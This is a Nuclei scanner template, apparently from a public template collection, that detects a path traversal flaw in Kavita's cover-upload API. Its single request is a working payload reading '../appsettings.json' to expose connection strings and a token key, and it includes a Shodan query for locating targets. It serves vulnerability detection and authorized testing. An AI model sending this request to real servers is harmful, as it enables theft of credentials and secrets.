id: kavita-lfi

info:
  name: Kavita - Path Traversal
  author: arafatansari
  severity: medium
  description: |
    kareadita/kavita allows Path Traversal by abusing the filename parameter of the /api/image/cover-upload.
  reference:
    - https://huntr.dev/bounties/2eef332b-65d2-4f13-8c39-44a8771a6f18/
  metadata:
    verified: true
    shodan-query: http.html:"kavita"
  tags: kavita,lfi,huntr

requests:
  - method: GET
    path:
      - '{{BaseURL}}/api/image/cover-upload?filename=../appsettings.json'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"ConnectionStrings":'
          - '"Path":'
          - '"TokenKey":'
        condition: and

      - type: status
        status:
          - 200
